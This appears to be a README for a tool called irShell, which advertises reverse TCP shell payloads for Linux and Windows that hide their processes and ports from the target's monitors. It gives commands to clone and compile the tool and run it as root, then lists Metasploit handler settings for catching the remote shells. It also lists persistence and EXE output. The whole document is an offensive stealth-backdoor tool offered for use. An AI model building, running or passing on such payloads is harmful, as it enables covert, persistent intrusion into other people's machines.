💯% Invisible Reverse TCP Shell Payloads for Linux/Windows 🥷
What I believe to be an original and effective method for creating reverse TCP payloads that are 100% invisible not only to the target but the target's resource/process monitors, no PIDs or even open ports are visible. Simple MSFconsole handlers/listeners are then used for callbacks.
Pictured above is some Nmap and Grep output referencing this payloads used ports still showimg closed or not in use on the machine where the payload has been deployed. Pictured below are two screen captures of the same system's Htop output showing no process/PID
sudo apt install -y shc
sudo apt install -y bash
sudo apt install -y gcc
git clone https://github.com/MBHudson/irShell.git && cd irShell && sudo gcc irShell.c -o irShell && sudo chmod +x irShell
sudo ./irShell
set exploit/multi/handler
set PAYLOAD linux/x64/shell_reverse_tcp
set LPORT 4444
- Persistence without reboot
- EXE and Shell formats
- All-in-One built-in dependency installation